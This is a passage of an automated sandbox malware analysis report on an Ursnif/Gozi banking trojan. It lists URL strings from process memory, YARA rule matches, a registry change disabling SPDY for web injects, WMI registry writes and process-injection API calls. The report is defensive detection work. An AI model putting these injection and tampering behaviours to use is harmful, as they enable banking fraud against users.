        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
        Source: powershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000017.00000002.586167297.000001F7DDF1E000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe

        Key, Mouse, Clipboard, Microphone and Screen Capturing:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7156, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: control.exe PID: 6328, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6440, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5536, type: MEMORY

        E-Banking Fraud:

        barindex
        Detected Gozi e-Banking trojanShow sources
        Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff
        Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie
        Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7156, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: control.exe PID: 6328, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6440, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5536, type: MEMORY
        Disables SPDY (HTTP compression, likely to perform web injects)Show sources
        Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
        Source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
        Source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
        Source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
        Source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
        Source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
        Source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
        Source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
        Source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
        Writes or reads registry keys via WMIShow sources
        Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
        Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
        Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
        Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
        Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
        Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
        Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
        Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
        Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
        Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
        Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
        Writes registry values via WMIShow sources
        Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
        Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
        Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
        Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
        Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
        Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
        Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
        Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001C22 GetProcAddress,NtCreateSection,memset,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001AD1 NtMapViewOfSection,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001252 GetLastError,NtClose,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100023C5 NtQueryVirtualMemory,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F86EF1 GetProcAddress,NtCreateSection,memset,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F89DDB NtMapViewOfSection,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F87925 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F8B169 NtQueryVirtualMemory,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0138A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0138E010 GetProcAddress,NtCreateSection,memset,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01397AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01397579 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0139CD7A NtQueryInformationProcess,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01389DAC NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01396CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0139AC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0138ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A47A1 NtMapViewOfSection,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013837E7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01387E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01387878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013940A7 memset,NtQueryInformationProcess,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0138AA15 NtQuerySystemInformation,RtlNtStatusToDosError,
